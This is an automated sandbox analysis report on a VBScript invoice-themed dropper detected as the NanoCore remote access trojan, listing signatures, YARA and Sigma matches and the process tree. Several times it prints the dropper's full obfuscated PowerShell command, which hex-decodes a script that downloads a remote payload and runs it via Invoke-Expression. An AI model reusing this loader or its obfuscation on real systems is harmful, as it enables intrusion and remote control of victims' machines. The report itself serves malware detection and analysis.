Play interactive tour

Edit tour

Windows Analysis Report 9 ITEMS INVOICE RECEIPT.vbs

Overview

General Information

Sample Name:	9 ITEMS INVOICE RECEIPT.vbs
Analysis ID:	483356
MD5:	0384a449d571139a484a9d12a0ebebab
SHA1:	24b1d1b1015c6a094ba24cd08644d9e84a51fd9b
SHA256:	d25e7688f13dac827642a6487d821be79dd13e73e0e16f458c384a45fc3e8d5b
Tags:	NanoCorevbs
Infos:
Most interesting Screenshot:

Detection

Nanocore

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Malicious sample detected (through community Yara rule)

Sigma detected: NanoCore

VBScript performs obfuscated calls to suspicious functions

Detected Nanocore Rat

Multi AV Scanner detection for domain / URL

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Very long command line found

Injects a PE file into a foreign processes

Creates an undocumented autostart registry key

Sigma detected: CrackMapExec PowerShell Obfuscation

Hides that the sample has been downloaded from the Internet (zone.identifier)

Uses dynamic DNS services

Queries the volume information (name, serial number etc) of a device

Yara signature match

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

JA3 SSL client fingerprint seen in connection with other malware

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Uses insecure TLS / SSL version for HTTPS connection

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Sigma detected: Encoded PowerShell Command Line

Java / VBScript file with very long strings (likely obfuscated code)

Detected TCP or UDP traffic on non-standard ports

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Creates a process in suspended mode (likely to inject code)

Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

System is w10x64

wscript.exe (PID: 2256 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\9 ITEMS INVOICE RECEIPT.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)

powershell.exe (PID: 964 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/DJr8t4/edrfH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-*e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-*%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%7-X-%c-X-%7-X-*c-X-!9-X-!5-X-!e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%0-X-3d-X-%0-X-%7-X-!!-X-!f-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-*1-X-!!-X-53-X-5!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%7-X-%c-X-%7-X-57-X-*e-X-!c-X-*f-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-7%-X-!9-X-*e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%7-X-!9-X-*0-X-!5-X-58-X-%8-X-*e-X-*0-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-*0-X-*3-X-*0-X-5!-X-%0-X-%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-!%-X-!8-X-!e-X-!a-X-53-X-!!-X-!*-X-!7-X-!8-X-%9-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-*5-X-*0-X-57-X-*0-X-%d-X-!f-X-*%-X-*a-X-*0-X-!5-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-!5-X-!*-X-!7-X-!8-X-!a-X-%9-X-%e-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%8-X-%!-X-53-X-5a-X-58-X-!!-X-!3-X-!*-X-5*-X-%7-X-%9-X-3b-X-0a-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-%8-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-%d-X-!a-X-*f-X-*9-X-*e-X-%0-X-%7-X-%7-X-%9-X-7c-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-3b'.Replace('%','2').Replace('!','4').Replace('*','6');Invoke-Expression (-join ($SOS -split '-X-' | ? { $_ } | % { [char][convert]::ToUInt32($_,16) })) MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 3020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

aspnet_compiler.exe (PID: 2272 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
9 ITEMS INVOICE RECEIPT.vbs	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0x30:$s1: POwerSheLL

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\Public\Run\New.vbs	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0x30:$s1: POwerSheLL

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000003.433457033.00000268A5E21000.00000004.00000001.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0x9b0:$s1: POwerSheLL 0x2242:$s1: POwerSheLL
00000000.00000002.436664872.00000268A5E20000.00000004.00000001.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0x118:$s1: POwerSheLL
00000000.00000002.435967518.00000268A409A000.00000004.00000001.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0x2aa8:$s1: POwerSheLL
00000000.00000003.435054293.00000268A4349000.00000004.00000001.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0x170:$s1: POwerSheLL 0x1a30:$s1: POwerSheLL
00000000.00000003.434814918.00000268A4089000.00000004.00000001.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0x9b00:$s1: POwerSheLL
00000000.00000002.436347834.00000268A434A000.00000004.00000040.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0xa30:$s1: POwerSheLL
00000001.00000003.271462749.0000014681106000.00000004.00000001.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0x6938:$s1: POwerSheLL 0xcb78:$s1: POwerSheLL
00000001.00000002.428209979.0000014681671000.00000004.00000001.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0x2626:$s1: POwerSheLL 0x6454:$s1: powershell 0x6454:$sr1: powershell 0x6454:$sn1: powershell
0000000A.00000003.619763288.0000000004466000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x17fa:$a: NanoCore 0x181f:$a: NanoCore 0x1878:$a: NanoCore 0x11a15:$a: NanoCore 0x11a3b:$a: NanoCore 0x11a97:$a: NanoCore 0x1e8ec:$a: NanoCore 0x1e945:$a: NanoCore 0x1e978:$a: NanoCore 0x1eba4:$a: NanoCore 0x1ec20:$a: NanoCore 0x1f239:$a: NanoCore 0x1f382:$a: NanoCore 0x1f856:$a: NanoCore 0x1fb3d:$a: NanoCore 0x1fb54:$a: NanoCore 0x22edd:$a: NanoCore 0x24297:$a: NanoCore 0x242e1:$a: NanoCore 0x24f3b:$a: NanoCore 0x2a520:$a: NanoCore
00000000.00000002.435917609.00000268A408A000.00000004.00000001.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0x8b00:$s1: POwerSheLL
Process Memory Space: aspnet_compiler.exe PID: 2272	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xae26:$a: NanoCore 0xae3a:$a: NanoCore 0x416c1:$a: NanoCore 0x416e6:$a: NanoCore 0x451a9:$a: NanoCore 0x451cc:$a: NanoCore 0x45221:$a: NanoCore 0x503d0:$a: NanoCore 0x503f4:$a: NanoCore 0x5044c:$a: NanoCore 0x578c2:$a: NanoCore 0x5791b:$a: NanoCore 0x57941:$a: NanoCore 0x57cd7:$a: NanoCore 0x57d1b:$a: NanoCore 0x57d5e:$a: NanoCore 0x57db1:$a: NanoCore 0x57de0:$a: NanoCore 0x57fe6:$a: NanoCore 0x5805a:$a: NanoCore 0x58611:$a: NanoCore
Click to see the 6 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
10.3.aspnet_compiler.exe.4488eef.1.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x3831:$x1: NanoCore.ClientPluginHost 0x386a:$x2: IClientNetworkHost
10.3.aspnet_compiler.exe.4488eef.1.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x3831:$x2: NanoCore.ClientPluginHost 0x394c:$s4: PipeCreated 0x384b:$s5: IClientLoggingHost
10.3.aspnet_compiler.exe.446ee96.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x6da5:$x1: NanoCore.ClientPluginHost 0x6dd2:$x2: IClientNetworkHost
10.3.aspnet_compiler.exe.446ee96.0.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x6da5:$x2: NanoCore.ClientPluginHost 0x7d74:$s2: FileCommand 0xc776:$s4: PipeCreated 0x6dbf:$s5: IClientLoggingHost
10.3.aspnet_compiler.exe.44834c1.2.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x16e3:$x1: NanoCore.ClientPluginHost 0x6dd6:$x1: NanoCore.ClientPluginHost 0xd05f:$x1: NanoCore.ClientPluginHost 0x1766e:$x1: NanoCore.ClientPluginHost 0x21a99:$x1: NanoCore.ClientPluginHost 0x2ca76:$x1: NanoCore.ClientPluginHost 0x38818:$x1: NanoCore.ClientPluginHost 0x5d71c:$x1: NanoCore.ClientPluginHost 0x6cb5c:$x1: NanoCore.ClientPluginHost 0x171c:$x2: IClientNetworkHost 0xd098:$x2: IClientNetworkHost 0x177cb:$x2: IClientNetworkHost 0x21ad2:$x2: IClientNetworkHost 0x2ca90:$x2: IClientNetworkHost 0x38832:$x2: IClientNetworkHost 0x5d736:$x2: IClientNetworkHost 0x6cb99:$x2: IClientNetworkHost
10.3.aspnet_compiler.exe.44834c1.2.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x16e3:$x2: NanoCore.ClientPluginHost 0x6dd6:$x2: NanoCore.ClientPluginHost 0xd05f:$x2: NanoCore.ClientPluginHost 0x1766e:$x2: NanoCore.ClientPluginHost 0x21a99:$x2: NanoCore.ClientPluginHost 0x2ca76:$x2: NanoCore.ClientPluginHost 0x38818:$x2: NanoCore.ClientPluginHost 0x5d71c:$x2: NanoCore.ClientPluginHost 0x6cb5c:$x2: NanoCore.ClientPluginHost 0x185c4:$s3: PipeExists 0x1800:$s4: PipeCreated 0x6eb4:$s4: PipeCreated 0xd17a:$s4: PipeCreated 0x17864:$s4: PipeCreated 0x21be4:$s4: PipeCreated 0x2daab:$s4: PipeCreated 0x3a5c3:$s4: PipeCreated 0x60a59:$s4: PipeCreated 0x6ffaf:$s4: PipeCreated 0x16fd:$s5: IClientLoggingHost 0x6df0:$s5: IClientLoggingHost
10.3.aspnet_compiler.exe.44834c1.2.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x142b:$a: NanoCore 0x1484:$a: NanoCore 0x14b7:$a: NanoCore 0x16e3:$a: NanoCore 0x175f:$a: NanoCore 0x1d78:$a: NanoCore 0x1ec1:$a: NanoCore 0x2395:$a: NanoCore 0x267c:$a: NanoCore 0x2693:$a: NanoCore 0x5a1c:$a: NanoCore 0x6dd6:$a: NanoCore 0x6e20:$a: NanoCore 0x7a7a:$a: NanoCore 0xd05f:$a: NanoCore 0xd0d9:$a: NanoCore 0x1766e:$a: NanoCore 0x17758:$a: NanoCore 0x185cf:$a: NanoCore 0x21779:$a: NanoCore 0x217da:$a: NanoCore
10.3.aspnet_compiler.exe.4488eef.1.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x13a8:$x1: NanoCore.ClientPluginHost 0x7631:$x1: NanoCore.ClientPluginHost 0x11c40:$x1: NanoCore.ClientPluginHost 0x1c06b:$x1: NanoCore.ClientPluginHost 0x27048:$x1: NanoCore.ClientPluginHost 0x32dea:$x1: NanoCore.ClientPluginHost 0x57cee:$x1: NanoCore.ClientPluginHost 0x6712e:$x1: NanoCore.ClientPluginHost 0x766a:$x2: IClientNetworkHost 0x11d9d:$x2: IClientNetworkHost 0x1c0a4:$x2: IClientNetworkHost 0x27062:$x2: IClientNetworkHost 0x32e04:$x2: IClientNetworkHost 0x57d08:$x2: IClientNetworkHost 0x6716b:$x2: IClientNetworkHost
10.3.aspnet_compiler.exe.4488eef.1.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x13a8:$x2: NanoCore.ClientPluginHost 0x7631:$x2: NanoCore.ClientPluginHost 0x11c40:$x2: NanoCore.ClientPluginHost 0x1c06b:$x2: NanoCore.ClientPluginHost 0x27048:$x2: NanoCore.ClientPluginHost 0x32dea:$x2: NanoCore.ClientPluginHost 0x57cee:$x2: NanoCore.ClientPluginHost 0x6712e:$x2: NanoCore.ClientPluginHost 0x12b96:$s3: PipeExists 0x1486:$s4: PipeCreated 0x774c:$s4: PipeCreated 0x11e36:$s4: PipeCreated 0x1c1b6:$s4: PipeCreated 0x2807d:$s4: PipeCreated 0x34b95:$s4: PipeCreated 0x5b02b:$s4: PipeCreated 0x6a581:$s4: PipeCreated 0x13c2:$s5: IClientLoggingHost 0x764b:$s5: IClientLoggingHost 0x11c5a:$s5: IClientLoggingHost 0x1c085:$s5: IClientLoggingHost
10.3.aspnet_compiler.exe.4488eef.1.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x13a8:$a: NanoCore 0x13f2:$a: NanoCore 0x204c:$a: NanoCore 0x7631:$a: NanoCore 0x76ab:$a: NanoCore 0x11c40:$a: NanoCore 0x11d2a:$a: NanoCore 0x12ba1:$a: NanoCore 0x1bd4b:$a: NanoCore 0x1bdac:$a: NanoCore 0x1bdef:$a: NanoCore 0x1be2f:$a: NanoCore 0x1c06b:$a: NanoCore 0x1c10b:$a: NanoCore 0x1c8e3:$a: NanoCore 0x1ced6:$a: NanoCore 0x1d027:$a: NanoCore 0x1de81:$a: NanoCore 0x1e0e8:$a: NanoCore 0x1e0fd:$a: NanoCore 0x1e11c:$a: NanoCore
10.3.aspnet_compiler.exe.446ee96.0.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x8ba5:$x1: NanoCore.ClientPluginHost 0x15d0e:$x1: NanoCore.ClientPluginHost 0x1b401:$x1: NanoCore.ClientPluginHost 0x2168a:$x1: NanoCore.ClientPluginHost 0x2bc99:$x1: NanoCore.ClientPluginHost 0x360c4:$x1: NanoCore.ClientPluginHost 0x410a1:$x1: NanoCore.ClientPluginHost 0x4ce43:$x1: NanoCore.ClientPluginHost 0x71d47:$x1: NanoCore.ClientPluginHost 0x81187:$x1: NanoCore.ClientPluginHost 0x8bd2:$x2: IClientNetworkHost 0x15d47:$x2: IClientNetworkHost 0x216c3:$x2: IClientNetworkHost 0x2bdf6:$x2: IClientNetworkHost 0x360fd:$x2: IClientNetworkHost 0x410bb:$x2: IClientNetworkHost 0x4ce5d:$x2: IClientNetworkHost 0x71d61:$x2: IClientNetworkHost 0x811c4:$x2: IClientNetworkHost
10.3.aspnet_compiler.exe.446ee96.0.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x8b7f:$a: NanoCore 0x8ba5:$a: NanoCore 0x8c01:$a: NanoCore 0x15a56:$a: NanoCore 0x15aaf:$a: NanoCore 0x15ae2:$a: NanoCore 0x15d0e:$a: NanoCore 0x15d8a:$a: NanoCore 0x163a3:$a: NanoCore 0x164ec:$a: NanoCore 0x169c0:$a: NanoCore 0x16ca7:$a: NanoCore 0x16cbe:$a: NanoCore 0x1a047:$a: NanoCore 0x1b401:$a: NanoCore 0x1b44b:$a: NanoCore 0x1c0a5:$a: NanoCore 0x2168a:$a: NanoCore 0x21704:$a: NanoCore 0x2bc99:$a: NanoCore 0x2bd83:$a: NanoCore
Click to see the 7 entries

Sigma Overview

AV Detection:

Sigma detected: NanoCore

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ProcessId: 2272, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

E-Banking Fraud:

Sigma detected: NanoCore

Show sources

Source: File created

System Summary:

Sigma detected: CrackMapExec PowerShell Obfuscation

Show sources

Source: Process started

Author: Thomas Patzke: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/DJr8t4/edrfH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-*e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-*%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%7-X-%c-X-%7-X-*c-X-!9-X-!5-X-!e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%0-X-3d-X-%0-X-%7-X-!!-X-!f-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-*1-X-!!-X-53-X-5!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%7-X-%c-X-%7-X-57-X-*e-X-!c-X-*f-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-7%-X-!9-X-*e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%7-X-!9-X-*0-X-!5-X-58-X-%8-X-*e-X-*0-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-*0-X-*3-X-*0-X-5!-X-%0-X-%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-!%-X-!8-X-!e-X-!a-X-53-X-!!-X-!*-X-!7-X-!8-X-%9-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-*5-X-*0-X-57-X-*0-X-%d-X-!f-X-*%-X-*a-X-*0-X-!5-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-!5-X-!*-X-!7-X-!8-X-!a-X-%9-X-%e-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%8-X-%!-X-53-X-5a-X-58-X-!!-X-!3-X-!*-X-5*-X-%7-X-%9-X-3b-X-0a-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-%8-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-%d-X-!a-X-*f-X-*9-X-*e-X-%0-X-%7-X-%7-X-%9-X-7c-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-3b'.Replace('%','2').Replace('!','4').Replace('*','6');Invoke-Expression (-join ($SOS -split

Sigma detected: Encoded PowerShell Command Line

Show sources

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/DJr8t4/edrfH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-*e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-*%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%7-X-%c-X-%7-X-*c-X-!9-X-!5-X-!e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%0-X-3d-X-%0-X-%7-X-!!-X-!f-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-*1-X-!!-X-53-X-5!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%7-X-%c-X-%7-X-57-X-*e-X-!c-X-*f-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-7%-X-!9-X-*e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%7-X-!9-X-*0-X-!5-X-58-X-%8-X-*e-X-*0-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-*0-X-*3-X-*0-X-5!-X-%0-X